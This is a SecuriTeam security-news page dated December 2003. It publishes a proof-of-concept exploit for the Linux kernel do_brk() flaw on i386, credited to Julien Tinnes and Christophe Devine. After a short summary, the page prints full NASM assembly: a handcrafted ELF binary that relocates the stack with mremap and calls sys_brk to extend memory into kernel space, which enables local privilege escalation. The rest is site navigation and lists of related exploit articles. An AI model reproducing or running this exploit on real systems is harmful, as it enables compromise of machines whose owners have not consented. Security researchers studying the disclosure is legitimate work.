Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Linux Kernel Do_brk(), Another Proof-of-Concept Code For I386 7 Dec. 2003    Summary The previous version of the exploit was relying on the Linux ELF loader to call do_brk for us. This one uses sys_brk(), but to bypass a check of available memory in sys_brk we still have to map our code high in memory (but not past PAGE_OFFSET this time). To be able to call sys_brk successfully we need to make sure that the stack isn't above our program (in most cases we have to move it).   Credit: The information has been provided by Julien TINNES Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Exploit: ; Use NASM 0.98.38 or higher to compile. ; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org) ; ; This exploit uses sys_brk directly to expand his break and doesn't rely ; on the ELF loader to do it. ; ; To bypass a check in sys_brk against available memory, we use a high ; virtual address as base address ; ; In most case (let's say when no PaX w/ ASLR :) we have to move the stack ; so that we can expand our break ;   BITS 32                 org     0xBFFF0000   ehdr:                 ; Elf32_Ehdr       db  0x7F, "ELF", 1, 1, 1    ; e_ident     times 9 db  0       dw  2           ; e_type       dw  3           ; e_machine       dd  1           ; e_version       dd  _start          ; e_entry       dd  phdr - $$         ; e_phoff       dd  0           ; e_shoff       dd  0           ; e_flags       dw  ehdrsize        ; e_ehsize       dw  phdrsize        ; e_phentsize       dw  2           ; e_phnum       dw  0           ; e_shentsize       dw  0           ; e_shnum       dw  0           ; e_shstrndx   ehdrsize  equ   $ - ehdr   phdr:                 ; Elf32_Phdr       dd  1           ; p_type       dd  0           ; p_offset       dd  $$          ; p_vaddr       dd  $$          ; p_paddr       dd  filesize        ; p_filesz       dd  filesize        ; p_memsz       dd  7           ; p_flags       dd  0x1000          ; p_align   phdrsize  equ   $ - phdr   _start:       ; ** Make sure the stack is not above us       mov   eax, 163   ; mremap       mov   ebx, esp              and   ebx, ~(0x1000 - 1)  ; align to page size       mov   ecx, 0x1000   ; we suppose stack is one page only       mov   edx, 0x9000   ; be sure it can't get mapped after               ; us       mov   esi,1     ; MREMAP_MAYMOVE       int   0x80       and   esp, (0x1000 - 1)   ; offset in page       add   esp, eax      ; stack ptr to new location                 ; nb: we don't fix                 ; pointers so environ/cmdline                 ; are not available       mov   eax,152   ; mlockall (for tests as root)       mov   ebx,2     ; MCL_FUTURE       int   0x80       ; get VMAs for the kernel memory       mov   eax,45    ; brk       mov   ebx,0xC0500000       int   0x80              mov   ecx, 4   loop0:              mov   eax, 2    ; fork       int   0x80       loop  loop0   _idle:       mov   eax,162   ; nanosleep       mov   ebx,timespec       int   0x80       jmp   _idle   timespec  dd  10,0   filesize  equ   $ - $$  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®